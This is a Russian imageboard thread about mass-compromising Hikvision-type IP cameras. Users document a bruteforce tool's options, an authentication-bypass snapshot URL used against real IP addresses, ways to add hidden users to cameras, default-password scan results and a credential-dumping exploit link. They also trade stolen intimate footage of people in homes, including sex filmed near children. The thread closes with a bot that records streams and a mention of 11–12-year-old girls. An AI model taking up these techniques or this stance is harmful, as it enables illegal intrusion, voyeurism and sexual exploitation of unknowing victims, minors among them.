В targets.txt нужно вставить блоки IP. В logins и passwords должны быть ваши логины и пароли. В папку good будут сохранятся изображения с камер. После перебора можно подключиться к видеорегистратору при помощи программы IVMS-4200 http://overseas.hikvision.com/europe/Tools_84.html .
Полный список команд hikka:
-bf-threads int Bruteforcer threads count (default 1)
-check Check cameras (experimental and not fully tested, but very useful)
-csv string Write result to CSV
-json string Write result to JSON
-logins string A file with a list of logins to bruteforce (default "logins")
-m3u string Write result to m3u playlist
-passwords string A file with a list of passwords to bruteforce (default "passwords")
-port int Camera service port (default 8000)
-shoots string Download pics from cameras into a folder
-threads int Threads count (default 1)
Предыдущий тред: >>104004 (OP)
Предыдущие треды:
http://arhivach.org/thread/276335/
http://arhivach.org/thread/265520/
http://arhivach.org/thread/233115/
http://arhivach.org/thread/191918/
http://arhivach.org/thread/172733/
http://arhivach.org/thread/152648/
http://arhivach.org/thread/148880/
что бы на сосач выкидывать потом
Сам не понял. Может морг какой. Или операционная. Но что то долго эта колбаска ливерная в зажимах на воздухе лежит для операционной то.
Походу на камере есть ЖД
$ ./info.sh -h 94.101.55.47
Snapshot URL:
http://94.101.55.47:80/Streaming/channels/1/picture?auth=YWRtaW46
Users:
<id>1</id><userName>admin</userName>
HDD:
<StorageVolume>
<id>1</id>
<volumeName>HDD1</volumeName>
<volumeType>VirtualDisk</volumeType>
<storageDescription>DAS</storageDescription>
<storageLocation>HDD</storageLocation>
<storageType>internal</storageType>
<capacity>14804</capacity>
<status>HD_NORMAL</status>
</StorageVolume>
DDNS:
XPath set is empty
Скинь плз этого самца [email protected]
мне тоже скинь пж [email protected]
Много свистелоперделок прикрутил? Не делился еще им ни с кем? Поделишься?
Ну ладно, можешь дайть кусок запроса который выдает инфу по hdd?
Скрины конечно збс, но и по ним понятно, что кроме как скрина, более получить ничего нельзя. Этож сколько ты обновлял чтоб заполучить жопу)))
И кстати хата странная, дверь железная и тут же гостиная с кухней, справа еще проход, но куда? Да и окно рядом с дверью говорит о том что это явно не многоэтажка, а вообще первый этаж
С ваилдным Authorization юзеры и пасы добавляются/меняются на ура - стоит перейти на YWRtaW46 и усе :(
Не видел ни одного пруфа, чтоб без валидной авторизации добавляли пользователя.
>Не видел ни одного пруфа
а тебе некто и не покажет, зачем дополнительно увелиивать армию школьников убивающие камеры...
Тот кто сам соображает, и программист с опытом, таким достаточно взглянуть на скриншот, и сразу понятно что, куда и как на самом деле надо подставлять чтоб добавить пользовтеля, все просто, но школьникам не хватает элементарных знаний, и это такой своеобразный фильтр от них
Я ПОНЯЛ КАК ПОЛЬЗОВАТЕЛЯ ДОБАВИТЬ!!!!
СУКА Я ТУПОЙ ПИЗДЕЦ, ЦЕЛЫЙ МЕСЯЦ ТУПИЛ, БЛЯТЬ!!!
А ТАК ВСЕ ПРОСТО ОКАЗАЛОСЬ!
кто не верит кидайте ip для теста
Только давайте камеру не из СНГ, а то вдруг это "хонейпот", стремно мне так палится. Также желательно чтоб камера была прикольная, в душе например или туалете, чтоб был хоть какойто профит от добавления пароля
азаза затролел...
Предложение еще актуально, кто хочет увидеть добавление пароля, давайте годную камеру не в СНГ
адрес дай, я напишу с [email protected]
Камер полно, добавь пользователя хоть в одну, покажи что можешь, а там я еще подкину.
>а там я еще подкину.
или не подкинеш, а будеш точно знать что так можно, и у тебя появится стимул копать искать уязвимость
>уже чувствую как подкрадывается пиздец
Не ссы, пока палить не буду
Хз, сначала я отснифил нажатие кнопки в интерфейсе, а потом пост куна о чеке на жесткий диск подтолкнул к решению...
И все равно лень что то делать
Скину 2 камеры с гомосеками, взамен годнота с обычными МЖ с еблями, скрины вашего, после отправлю гомосэков. пишите мыло.
Что то я все равно слишком тупой.
Итак и так посылаю запрос :/ уже 3-4 способа добавить юзера нашел - но, увы только с валидным паролем
Алсо, судя по https://www.cvedetails.com/vulnerability-list/vendor_id-13150/Hikvision.html а это список уязвимостей в хиквижене - есть еще баг, когда можно не добавлять юзера, а достать пароли из файла лол
Ну и да они там подсуетились и выпустили новую прошивку
https://ipcamtalk.com/threads/backdoor-found-in-hikvision-cameras.17523/page-5
Ну вот и школьники добрались.
Радости полные штаны.
Вы хоть юзеров удаляйте.
Time to say goodbye годным камерам теперь
https://www.youtube.com/watch?v=GjpI6tmIQco
>[email protected]
проверяй
Пиздец, как можно ебаться при детях. Я от кота даже закрываюсь, а эти прямо ебутся.
Еьать он отмороженный. Он не врубается, что под камерой дрочит?
он ведь не знает, что весь двач на него смотрит через эту камеру. Знал бы, то не дрочил, думаю.
Некоторые, кстати, закрывают камеры перед еблей, уж не знаю исходя из каких соображений.
Я параноик, даже телефон подальше убираю, вебку закрываю и камеру на телике, лол
нет таких камер, это всё выдумки!!! Или я еблан и делаю что-то не так!!! Скорее второе, но вдоль и поперёк знаю изначальную тему, а что сейчас выдумали даже понять не могу, тыкал, пробовал, но херов как дров....А два года тут с вами сижу и поддерживаю!!
ты хоть ип какойто дал, а то добавить юзера по скрину, ни как не получится
Ни разу ее с мужиком не видел, все время одна. Как ты ее в VLC засунул?
я тоже первый раз его вижу. Он ночу хотел её трахнуть но она не хотела, боялась что ребёнок проснётся.
Пто vlc, птосто записал целый дени черзез веб интерфейс, потом открыл видео в vlc
пару дней назад как бы хотела, несколько раз ласкала писю но быстро останавливалась
[email protected]
Такой вопрос. Ip-камеры пишут в архив? И если да, то возможно ли найти их в определенной локации? Интересует внешнее видеонаблюдение.
Если все это реально, запилю кулстори (не очень прохладную, но весьма российскую).
доставте жирух я знаю у вас есть
у меня только один вопрос. Почему у этого старичка так бодренько стоит хуй?
Алсо, годноты аля крипи плейс или спальных у меня много....
http://52.15.206.27/Streaming/channels/1/picture/?auth=YWRtaW46
Все еще реквестрирую пароль :(
https://geektimes.ru/post/292371/
Микрофон есть? Скинь ipшник, поиздеватся над дауномайнером
пиши сюда:
[email protected]
давай вместе поищем
есть варианты
напиши serg59rus джимэйл ком
>В чём смысл
>2017 год, искать смысл в действиях тупой шлюхи...
<!DOCTYPE html>
<html><head><title>Document Error: Method Not Allowed</title></head>
<body><h2>Access Error: 405 -- Method Not Allowed</h2>
<p>Method PUT not supported by file handler at this location </p>
</body>
</html>
Че за херь? Намекните хоть немного, я пойму дальше сам
>нахуа добавляешь нового пользователя?
Что значит зачем? А что ты предлогаеш?
владелец если следит за камерой, большинство следят, удалит нового пользователя
настройки не меняю
> большинство следят
Ты бредеш чтоли? Как ты себе это представляеш? Просыпается такой утром владелец камеры и перед завтраком идет проверять не появились ли новые пользователи на камере, и так каждый день??
На камеру он зайдет только если его пользователь перестанет работать или сама камера перестанет работать, а если аккуратно добавить нового пользователя, не трогая остальных, то владелец в жизне не заметит этого...
Ну аннончики, ну намекните как добавить Пермишинов пользователю добавленному через ?auth=YWRtaW46, сломал себе уже весь мозг
Как ты права устанавливаешь?
Я когда добавляю пользователя он сразу с правами добавляется. Правда работает только через веб интерфейс. Когда подключаясь через ивмс логинится, но стрим стореть не могу. Говорит нет прав
>Как ты права устанавливаешь?
никак, прав нет, при попытке их установить говорт это >>106838
>Я когда добавляю пользователя он сразу с правами добавляется.
Мы с тобой об одном и томже говорим, ты добавляеш через ?auth=YWRtaW46 ?
Я добавляю пользователя типа Operator, но у него не одна галочка remotePermission не стоит, поставить сам их не могу нет прав, хотя в вебпанель заходит, но делать там ничего не могу, немогу смотреть трансляцию, немогу смотреть записи, немогу подключиться через iVMS, не могу подключится через RTSP
> Когда подключаясь через ивмс логинится
У меня даже этого нет говорит неверный логин пароль
при попытке зайти через ivms
>У меня даже этого нет говорит неверный логин пароль
>при попытке зайти через ivms
Точнее говорит "The user is locked", но суть таже не пускает
User is locked говорит когда ты пароль несколько раз неправельно введёш и система блокирует его. Это ничего не имеет общего с правами
>при попытке их установить говорт это
Как ты пытаешся добавить права? каким запросом?
Блокируются у которых стоят новые прошивки и прописано что блокировать к примеру через 5 неудачных подключений
>Как ты пытаешся добавить права? каким запросом?
PUT XML в UserPermission или UserPermission/<id>
>>106844
>Блокируются у которых стоят новые прошивки и прописано что блокировать к примеру через 5 неудачных подключений
Да это я уже понял, но когда он разблокируется то пишет что пароль не верный (хотя он верный, просто прав нет)
сколько Колумбию проверял, нечего там годного найти не мог
повезло тебе
Баба за рулем - это пиздец. Тем более жирная. Еще и на ручник не поставила.
C-C-COMBO
При наличии знака 5.15.1 и намерении продолжить движение прямо, велосипедист должен спешиться и перейти проезжую часть как пешеход. В соответствии с пунктом 8.3. ПДД водитель при съезде с дороги обязан уступить дорогу пешеходам путь движения которых он пересекает.
куда прямо? не видишь разметки? движение по полосе только направо. куда перейти? ты видишь пешеходный переход уёбок?
>из нее еще корм для попугайчиков делают
скриптом годноту всю понаходили, пароли/порты поменяли, там прах и тлен
Создаю оператора, захожу в веб интерфейс - все нужные галочки стоят.
Подключаюсь через ivms - нет доступа
Не спорь со мной неуч. По существу есть что возразить? Чтобы велосипедисту стать пешеходом надо спешится. «8.3. При выезде на дорогу с прилегающей территории водитель должен уступить дорогу транспортным средствам и пешеходам, движущимся по ней, а при съезде с дороги — пешеходам и велосипедистам, путь движения которых он пересекает».
upd
4.1. Пешеходы должны двигаться по тротуарам, пешеходным дорожкам, велопешеходным дорожкам, а при их отсутствии — по обочинам.
up, аноночики намекните - надо ди париться с md5 хуйней в пермиссионе?
> Выезд на дорогу с прилегающей территории
Я на права давно сдавал , но это же хуйня про выезд из двора/парковки на дорогу
пешеблядь, плз
«Прилегающая территория» — территория, непосредственно прилегающая к дороге и не предназначенная для сквозного движения транспортных средств (дворы, жилые массивы, автостоянки, АЗС, предприятия и тому подобное). Движение по прилегающей территории осуществляется в соответствии с настоящими Правилами.
В данном случае это и есть прилегающая территория, не перекресток. Pic related. Впрочем на перекрестке велосипедисту нужно двигаться также, только п. 8.3 заменяется на 4.3.
Блать, digest auth принимает только верный пасс ^_^
но, эта фигня брутабельна :0
Ну же , анончики, намекните как добавить права
Короче, пиндосы покупали у китайцев эти камеры, хитрые узкоглазые встроили анальный эксплоит.
Естественно, утаить им этот факт не удалось :) Вот мы теперь и наслаждаемся.
Нет бы помочь анону, твоему постоянномуд ругу и собеседнику. Какие же вы все-таки пидоры, хуй я вам еще что-то выложу.
Я думал выложить мои наработки, но они ещё сырые и позорные
Хз, может завтра выложу
Я хз, содержится в нем пас или нет.
Попробуй выкачать файл, сбросить админа и восстановиться.
Заодно и нам сообщи *_^
Да пиздеж это все, через HikCGI (в котором нашли дырищу) нельзя изменять/добавлять права у пользователей, а по остальным протоколам (ISAPI, PSIA) нужно авторизоваться с правильным паролем для внесения изменений. Вот configfile по идее можно дешифровать и вытащить от туда пароль, только я хз как
Хотя вру, это я дерево, оказывается надо в веб-версии логиниться с созданными юзерами, тогда работает, в ivms пишет no permission
многие регистраторы не поддерживают веб-версии и наоборот
Весь функционал видно на скрине
Не на всех камерах нормально (с правами добавляется юзер)
Должна быть java установлена.
Из консоли: java -jar HikkaTools.jar ipшник
Сорцы https://github.com/taclomoto/HikkaTools
Готовый файл http://rgho.st/7glMXcc8T
Если есть замечания, предложения - пишите в тред.
Cпасибо, анончик. Ты охуенен.
А как получать картинки с камер без найденных паролей?
Как прикрутить массовое добавление/смену юзеров напарсеных ipшников?
SERG
правда зачем такой хуйней заниматься, добавил юзера и смотри сколько угодно
1) часть снимков выходит битая - не только jpg качается
Запилил на окна на Си.
1) По первым тестам, это не другой формат, а отказ в доступе и прочая мутатень типа: (Как я понял, могу ошибаться)
HTTP/1.1 401 Unauthorized
<?xml version="1.0" encoding="UTF-8" ?>
<ResponseStatus version="1.0" xmlns="urn:psialliance-org">
<requestURL>/Streaming/channels/1/picture/</requestURL>
<statusCode>4</statusCode>
<statusString>Invalid Operation</statusString>
</ResponseStatus>
<!DOCTYPE html>
<html><head><title>Document Error: Unauthorized</title></head>
<body><h2>Access Error: 401 -- Unauthorized</h2>
<p>Authentication Error: Your client does not have permission to get URL /Streaming/channels/1/picture/ from this server.</p>
</body>
</html>
> 1) часть снимков выходит битая - не только jpg качается
Проверяй content type в хидеое
> Запилил на окна на Си.
Если это какой либо DownloadToFile - то будут муки с 1
> 1) По первым тестам, это не другой формат, а отказ в доступе и прочая мутатень типа: (Как я понял, могу ошибаться)
Эксплоит та хрень с auth юзай
Через SOCKET, по GET запросу, прием данных через recv();
Content-Type: image/jpg
Все остальное дичь, которую описывал вверху.
Сейчас влепил строковые функции на вхождение и копирование строк, и breakанул эту дичь до цикла,
Процесс пошел быстрее без зависания.
Пока 1 одном потоке.
*
Говна правда немерено, картинок маловато, правда просканил всего 500-600 ипов.
То что сказал, гляну...
Прикрутил timeout к socket на ответ хоста, скорость самолет стала.
Единственное, что заметил, что с такой скорость, после 2-3 прогона по одному и тому же списку ипов, на 4 ты получаешь бан или что-то вроде этого:) через 5-10 минут снова прогоняется.
Какие форматы ты еще ловил? Если было такое...
Просто у всех ипов где есть скрины, Сигнатура jpg...
>>107197
Каждая блять хочет себя почувствовать какером)
На деле даже Hello World не напишут;)
>Проверяй content type в хидеое
>>107110
>> 1) часть снимков выходит битая - не только jpg качается
Уж очень ты меня заинтриговал, прикрутил даже так, + скачку и переименовку .формата файла.
Но скажу, что кроме jpg, ничего нет пока...
Методичку почитай, там несколько фооматов может быть
Думаю хватит и контент тупе имадже Хотя вряд ли кто меняет этот параметр
>>107238
На некоторых камерах юзер создаётся нормально, но ивмс права не видит.
Но можно через ртсп подключаться и т.д. и т.п.
>Методичку почитай, там несколько фооматов может быть
Да мне сейчас без разницы я завязал ее на jpg, png, bmp. Все три жрет и отправляет файлом ко мне.
А то что на скрине, выводит какой Content-Type, для себя прикрутил для теста...
>На некоторых камерах юзер создаётся нормально, но ивмс права не видит.
>Но можно через ртсп подключаться и т.д. и т.п.
Вот это странная дичь, причем, если зайти под админом и перекликать галочки, все норм работает... Возможно, что IVMS работает по другому ведь вся схема идет по 80/TCP,UDP (HTTP (HyperText Transfer Protocol), а IVMS на 8000/TCP,UDP iRDMI (Intel Remote Desktop Management Interface)
Или я несу чушь)))
Хз, сейчас сканил камеры
С первого диапазона ( /8 ) всего 8 камер
С второго 66 ( а всего ип с открытым 8000 и 80 портом было ~9700)
Вот и сказочки конец, кто успел тот молодец
Нужно искать и другие порта. Вот что в моей базе (взято с шодана)
MariaDB [sh]> select http_port, count(*) as c from sh3 group by http_port order by c desc;
+-----------+--------+
| http_port | c |
+-----------+--------+
| 80 | 313117 |
| 81 | 238664 |
| 82 | 137752 |
| 83 | 93067 |
| 84 | 65673 |
| 88 | 30076 |
| 443 | 23715 |
| 8080 | 14396 |
| 8081 | 9215 |
| 8090 | 7443 |
| 8001 | 4542 |
| 9000 | 2072 |
| 8888 | 1732 |
| 444 | 1711 |
| 8086 | 1624 |
| 8000 | 1313 |
| 7071 | 1290 |
| 8010 | 1240 |
| 9001 | 1222 |
| 8181 | 1199 |
| 5000 | 1114 |
| 8089 | 1035 |
| 8008 | 845 |
| 5001 | 836 |
| 9002 | 789 |
| 32400 | 718 |
| 311 | 663 |
| 10000 | 638 |
| 8009 | 595 |
| 8889 | 530 |
| 3000 | 439 |
| 9080 | 398 |
| 8098 | 391 |
| 3001 | 381 |
| 8443 | 357 |
| 8880 | 344 |
| 8060 | 335 |
| 1234 | 326 |
| 7777 | 324 |
| 631 | 319 |
| 5555 | 314 |
| 4443 | 298 |
| 2082 | 292 |
| 8112 | 282 |
| 1400 | 266 |
| 8800 | 247 |
| 2083 | 235 |
| 4040 | 230 |
| 8140 | 220 |
| 1311 | 220 |
| 8139 | 199 |
| 2086 | 196 |
| 1471 | 195 |
| 9009 | 192 |
| 2087 | 183 |
| 9191 | 181 |
| 8069 | 177 |
| 1741 | 176 |
| 2480 | 171 |
| 2375 | 162 |
| 2376 | 162 |
| 9443 | 157 |
| 9200 | 152 |
| 3128 | 145 |
| 3541 | 140 |
| 3780 | 133 |
| 7779 | 132 |
| 4567 | 130 |
| 5900 | 129 |
| 4022 | 127 |
| 3689 | 125 |
| 3749 | 123 |
| 5560 | 119 |
| 3542 | 118 |
| 5901 | 116 |
| 8834 | 114 |
| 5985 | 113 |
| 5601 | 113 |
| 3790 | 112 |
| 5357 | 112 |
| 4848 | 110 |
| 5986 | 109 |
| 9595 | 108 |
| 8334 | 105 |
| 49153 | 102 |
| 9981 | 100 |
| 5984 | 99 |
| 6664 | 97 |
| 7474 | 96 |
| 10243 | 94 |
| 1080 | 93 |
| 7657 | 91 |
| 9944 | 89 |
| 4664 | 85 |
| 9943 | 85 |
| 7548 | 83 |
| 4782 | 81 |
| 9869 | 79 |
| 50070 | 77 |
| 55553 | 74 |
| 49152 | 74 |
| 16992 | 70 |
| 13579 | 69 |
| 55443 | 67 |
| 16993 | 65 |
| 7547 | 64 |
| 51106 | 62 |
| 25105 | 55 |
| 23424 | 53 |
| 28017 | 50 |
| 51080 | 18 |
| 49955 | 9 |
| 21 | 1 |
| 85 | 1 |
+-----------+--------+
114 rows in set (0.29 sec)
Раньше я бы получил на порядок больше камер с диапазона...
Надо чтоб остальные аноны подтвердили :/
ты донатил шодану?
>>107298
как мне кажется, шодан сколько выдавал, столько и выдает результатов
заметил только что он нахаляву стал давать меньше результатов на странице и страниц две, раньше давал пять
Гоу обмен годнятиной
Неа, нету
Тян няшная, но в этой комнате только спит и максимум колготки снимает/до трусов и лифчика оголяется
На фотке кстати момент когда она из жопы что то пробует на вкус
>Тян няшная, но в этой комнате только спит и максимум колготки снимает/до трусов и лифчика оголяется
Регулярно такое встречается
Звук есть?
Любит пожрать видать. Как так вышло, что одна камера и с записью? Я такую годноту лютую встречаю по 3-5 камер, а харда нет. А уж если одна камера всего, то 100% без записи.
Шли сюда
[email protected]
Эх вы школота, годнее ее ничего тут не было
>>107369
да, закинь скринов и видео с неё, а то не успел там ничего глянуть. Камеру находил, но она сразу и сдохла
отправь скрины на [email protected]
ЗАйди на любой регистратор, где в настройках есть раздел "Камера". Туда можно добавить свой ай-пишник и учетку от него. Запись будет идти на этот регистратор
От души, получается нужно найти такой ип еще.
>>107485
А теперь о хуемразях! - печальные новости... они уже на других портах, либо одна из хуемразей что-то понимает в азах програм. либо это делает тот кто выложил скрипт на $bash
Не так просто ... когда добавляю юзера, через веб подключается а через ивмс(порт 8000) никак. Другие регистраторы подключаются через порт 8000 так что никак не получиться
Вчера так же дрочил, забыл камеру отвернуть в сторону, как я всегда обычно делаю, и камера у меня в том же месте находится.
да, но это не долго. Бери какие-то склады желательно, там охранники обычно не лазят по настройкам. Да если и увидит на свободном канале твою запись, то будет только рад
Шликает как под одеялом, так и над ним
Поменя на подобную
>>107563
Воу.. Круто!
у меня есть кое что интересное (3 камеры + доступ к личным файлам на компьютере с интимом +архив к ДД записям на 100гб) надеюсь заинтересует. почта [email protected], поменяюсь на подобные. Камеры не двигаю, логи стираю.
Знаю логин, и что пароль в диапазоне 1000-100000
Hikka брутит только на :8000 ?
Открой свою хику в отладчике и запатчи на 89 порт.
мимо сишник
Я не был бы так уверен
>>107595
Шапку треда прочитай для начала
Спасибо )
Порт поменял
Но проблема: специально решил проверить на камере с рабочей комбинацией
вписал ip, 1 логин и 1 пароль
в браузере просит авторизацию а hikka выдает: is dead
Это может быть связано с тем, что камера не hikvision?? и есть ли решение?
Как понять на камере? я вписал порт камеры в start.bat:
hikka -threads 200 -check -shoots pics -port 81
Ну давай разбираться.
У этих камер ( и китайских подделок под хику ) есть три порта
1. ртсп порт - для передачи видео и т.д. и т.п. По дефолту вроде ~540
2. Веб порт - для веб интерфейса, вебапи По дефолту 80
3. Админ порт - для управления через проги ( ивмс и прочая хрень ) Обычно 8000
Хика брутит как раз админ порт, а твой 89 это скорее порт от веб интерфейса
Алсо, во многих камерах включена защита от брутфорса - то есть 5-6 попыток и получаешь бан ( на веб интерфейсе точно работает, а вот как с хиккой я не знаю) , но думаю гиблое это дело....
Если есть веб интерфейс, то лучше проверь на эксплоит
Теперь понятно, спасибо! Все верно, это был веб
А вебка на одном из этих портов, или как правило на всех трех?
А то сколько камер перелопатил с shodan, практически всегда либо 80 либо 8000, но не с нулями а 81-99, 8080 8090 и тп..
А с hikka и 8000 у меня стразу не заладилось )
Просканил блоков по моему на 200000ip выдало только 3 результата, и те не сломались в hikka
Не представляю сколько времени у вас уходит, но и вебки зато попадаются в hd и со звуком
>[email protected]
глянь почту
В веб интерфейсе аналогично вылетает: захожу, через минуту выкидывает, и пишет заблокировано на 30 мин или не правильный логин/пароль
У них прошивка была кривая, сейчас ее исправили, хозяева твоей камеры видимо не делали обновление
Годное что то на ней?
В обмен дам 4 годные камеры!
Вечером буду напишу,что бы сразу по факту,ты согласен на обмен?
Народ, как посмотреть какой открыт порт на конкретном ip?
В общем такое дело, я все это дело и ОП -поста запилил в ГУИ, все раскидал по полочкам, только вбивай айпи и получай джепеги. Но это не суть, ради чего это все? Я хочу как-то автоматизировать перебор картинок и ихкатегоризацию, улица, дом, сиськи, машины итд, вот и думаю на сколько это реально, как прикрутить api аля google images, никто не задумвался?
Скачай сканер портов и просканируй 0 -65000 порты на цели, софт например nmap/ zenmap (gui)
Все зависит от канала и железки, я запустил на ночь около 100 миллионов айпишников. на утро они были все прочеканы
Да реально конечно, прикрути классифицирующую нейроночку, и все дела.
Только вот готовой натренированной нейронки под это дело ты не найдешь, всякие там ImageNet на 1000 классов будут работать хреново, сиськи они не увидят, только машины, и даже улица/дом будут различать с трудом, потому что предназначены не для этого.
А чтобы самому натренировать, нужно предварительно разметить датасет, т.е. хотя бы пару десятков тысяч картинок классифицировать, желательно побольше. Ты готов это сделать? Размечай, выкладывай, будет нейронка.
Вот тут чуваки попытались что-то сделать без датасета, результат сомнительный
https://goo.gl/AAQas2
Чувак признаюсь,я пиздец какой тупой в плане программирования:D
>уязвимость запатчили
Школьники пишут Hacked на каждой второй камере, неудивительно
Теперь что, каждой камере присваиваются рандомные логин и пароль?
"Immediately upgrade or disconnect all Hikvision products from the internet or untrusted networks, or at least implement network access control rules that only allow trusted IP addresses to initiate connections to vulnerable devices. Keep in mind that many Hikvision IP cameras come with UPNP enabled by default and can expose themselves to the internet automatically. Hikvision released firmware updates for many camera models where backdoor code is removed. If an update is available for your device, you should install it as soon as possible."
это было неизбежно
Проверил через шодан, как он выдавал в среднем полтора лямов камер, так и выдает, на данный момент даже больше 1,602,990
То что многие меняют дефолтный пароль, это факт и он давно известен
Заметил кстати у многих, у кого дефолтный пароль стоит, заведена как минимум еще одна учетка и там стоит "сложный" пароль, но мы то заходим под админом
Да, на дефолте пока еще встречаются годные камеры, нахожу их довольно регулярно
Я про вот эту уязвимость http://seclists.org/fulldisclosure/2017/Sep/23
Если ты не заметил последние два треда мало кто брутил это дело хиккой.
Я думаю что мало кто читает такого рода новости, да и как они сами пишут надо знать какая у тебя камера, китайская или европейская...
Большинство брутит хиккой за неимением
>1 602 990
Это ведь количество веб морд камер, а реально уязвимых в разы меньше?
Это количество вебморд которые под хикавижн и рвэй только.
Уязвимы по своей сути все.
Разрабы тоже не дремлют и делают обновления которые сейчас толком не дают брутить, дают но ограниченное количество раз (6), потом камера блокируется
У многих эти обновления не стоят
HD камеры много где есть, не только на хиккавижне
У меня есть архив, небольшой на пару терабайтов
Слепил брутер. Брутил всю ночь 700к камер (шодан) на
admin:admin
66666:66666
88888:88888
Вот что получилась
+--------------+----------+
| loginErrorNo | count() |
+--------------+----------+
| -1 | 9 |
| 0 | 174368 |
| 1 | 4263 |
| 2 | 240404 |
| 3 | 61459 |
| 4 | 43 |
| 5 | 377 |
| 6 | 136 |
| 7 | 499 |
| 8 | 1552 |
| 9 | 226859 |
| 10 | 6 |
| 11 | 1096 |
| 12 | 1 |
| 14 | 1 |
| 17 | 4016 |
+--------------+----------+
0 - ОК
1,2,5,6 - Пароль непревельный или нету такого пользователя
3,7,8,9,10 - Не отвечает
Остальные разные проблемы
А вот и статистика на пароли
+--------+----------+----------+
| login | password | count() |
+--------+----------+----------+
| 666666 | 666666 | 39715 |
| 888888 | 888888 | 2039 |
| admin | admin | 133057 |
+--------+----------+----------+
Получается 25% на дефолтных паролях!! Пиздец!
Сейчас качая скрины.
Я говорил и не раз что много у кого дефолтные пароли оставлены
Как вы делайте что бы сохранить скрины один за другим и быстро
Обьесняюсь:
Скрин делается в двух этапов.
1. регестрирование callback функций
CLIENT_SetSnapRevCallBack(snapRev, userData)
2. запрос CLIENT_SnapPicture каторая как-то запускает callback функцию в бэкграунд потамучто сразы выходит
Если делать запросы один за другим то callback функция вобше не запускается а если добавить sleep v 1-2 секунды то работает но всё равно ести пропущеные скрины
Бразилия на 666666 - 687к скринов.
Удалил даже не смотрел, так как ради интереса тестил.
Что оставил?
Годнота есть в всех странах, где то больше, где то меньше
Желающие помочь пишите сюда videowmod @ mail.ru
http://prntscr.com/hd097i
http://prntscr.com/hd0cw5
http://prntscr.com/hdfgt7
http://prntscr.com/hdfr7o
http://prntscr.com/hdfsqj
http://prntscr.com/hdfw6n
мда ... у меня более 500к скринов с южной америке нужно неделю чтоб всё просмотреть. Серийный номер этих камер не подскажешь?
https://prnt.sc/hds51e
https://prnt.sc/hdsbbh
Обмен videowmod @ маил.ru это 37777, шлите свои скрины
перебирать эти скрины еще, замарачиваться, искать... есть кто это делает.
https://vk.com/smartpssivms и группа есть...
а тут ваще уже все напиленное https://vk.com/spycamhome и покупать не надо.
>203.56
нет, этой у меня нет. Такие появляются почти каждый день. Я не пойму, то ли юзеры прохавывают и что-то делают или обновляется прошивка. Такое чувство, что для админа запрещается логин из интернета
У кого есть время всё это просмотреть вот ссылка
https://cloud.mail.ru/public/23jC/8DFsiuzdF
Найдёте годноту пишите на [email protected]. За три годные камеры дам ип одной из них. Отправьяйте просто имя номер файла до _ без пути: Например для файла 20171115/EU/RU/12345_8.jpg отправляйте просто 12345.
Скрины маленкие но достаточно чтоб понять что на картинке. Оригиналы вешут в 20 раз больше поэтому и сгенерировал thumbs
Скачал
Такое чувство что их уже перебирали, есть пропуски
Слишком сильно уменьшена картинка, приходится напрягаться чтобы разглядеть
Нашел вроде как салон красоты только
Отсмотрел не все еще
Ты делай размер хотя бы 224 по меньшей стороне.
Может для датасета пригодится.
а сам то хули тут делаешь? А отсюда сразу в сисси тред пойдешь, да? девушка у него, лол
Любое колличество паролей и логинов
https://2ch.hk/web/res/108424.html
http://prntscr.com/hiatv4
Поменяюсь, есть куча камер
videowmod @ маил.ru, шлите свои скрины
Этим занимались в начале нулевых, в домике у "Кекса"
Кто то есть оттуда?
Так какой версии фреймворк и редисты нужны? Не могу запустить на семерке. Под 64 битную винду собиралось или можно и на 32?
Беременные мне интересны
Готов обменять
Что тебя интересует?
В каждой недели 2-3 раза трах, 2-3 раза шляк
Меняю только на супер годноту
Это все только с лупой смотреть, а так камеры нечего, посмотрел бы их в хорошем разрешении
Вижу только ужасно низкое разрешение и ремонт, я у себя такие камеры не оставляю
Думаешь что там джамшуты шпилятся?
Велосипедист - транспортное средство.
Он должен был ехать, как и ехал. Ну мб чуток левее, чтобы обозначить свою позицию на полосе.
>Велосипедист - транспортное средство.
Нет. Велосипедист — лицо, управляющее велосипедом.
>Он должен был ехать, как и ехал.
Нет, он должен был действовать как я написал. Не согласен? Аргументируй свою позицию со ссылками на ПДД, как и я.
https://t.me/joinchat/GYMmYRGXfJiZT6d0zPw8cQ
На второй секунде на изображении проскакивает что-то полупрозрачное снизу вверх. Первый раз в районе второго столба слева от ворот. Второй раз на 3-4 секунде примерно по центру ворот.
Дело происходит ночью в марте, вокруг снег, пыли и тепла вроде нет.
Моё мнение, что это какой-то далёкий блик или переотражение внутри объектива от каких-нибудь дальних фар или капель воды или чего-то такого.
Электромагнитные наводки внутри оборудования?
Если бы это падало, было бы понятнее, но оно движется снизу вверх.
Или всё же нужно спасаться, потому что началось?
>но оно движется снизу вверх
Линза переворачивает изображение. Мое мнение - что-то падает между линзой и матрицей. Капли конденсата, иней, или что-то еще.
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
Эсплоит тянет пароли. Ничего брутить не надо.Проверил, патишет.
Только учитывайте что логи с IP все пишутся там и на некоторых моделях логи удалить нельзя
Молодец что спалил в этом рыготном треде!
Красавчик просто!
Радует только, что на этом скрипте далеко не уедут.
Да это тема вообще вся бесполезная и время затратная, так что тут нечего палить то особо. Да и 80% тут сидящих скрипт не смогут запустить без мануала и картинок
Именно с этим скриптом да.
Если как следует причесать Exploit, убрать python, обернуть в многопоточность, сделать вывод в файл и найти http request for snapshot, то это уже бомба.
>и найти http request for snapshot
Кто нибудь нашёл документацию sdk/api?
Как только появляется брют для массового пользователя годноты не остаётся совсем.
Камер с дефолтным паролем выпускается все меньше.
Бруты нужны уже под каждую конкретную уязвимость или модель.
Процесс поиска дыр в твоей мамаше куда интереснее реверса прошивок.
Можете ли вы разместить больше таких видео?
это действительно sesxy смотреть, как мама занимается сексом перед ее маленьким сыном )
uejzadX
all cameras is dead now, buddy. There's nothing you can do
Нашел опенсорсный скриптик с лыcнером который мониторит в прямом эфире твоих подписчиков, прямые эфиры, реплеи и скачивает их соответственно. Изменил его немного под себя.
Экспериментальным путем стало понятно, что качать в первую очередь нужно только прямые трансляции так как реплеи с годнотой быстро удаляют.
Так как сидеть весь день в перескопе ожидая появление годноты не представляется возможным, быстро набросал бота-подписчика на питоне.
Пробовал вначале бота для liveomg, но остановился на боте для pscp.tv
Он кароче постоянно ищет на этом сайте определенные слова, находит новые прямые трансляции с этими словами и подписывается на эти каналы если ещё не подписан.
Ну а первый скрипт соответственно, качает эти прямые трансляции и реплеи, если последние остаются за последние 12 часов.
Запустил все это на сервере и забыл. Я конечно ожидал что это будет хит но такого количества бабищ лёгкого поведения никак не ожидал.
Куда катится россиюшка? 11-12 летние готовые за 100 рублей показать все что возможно.
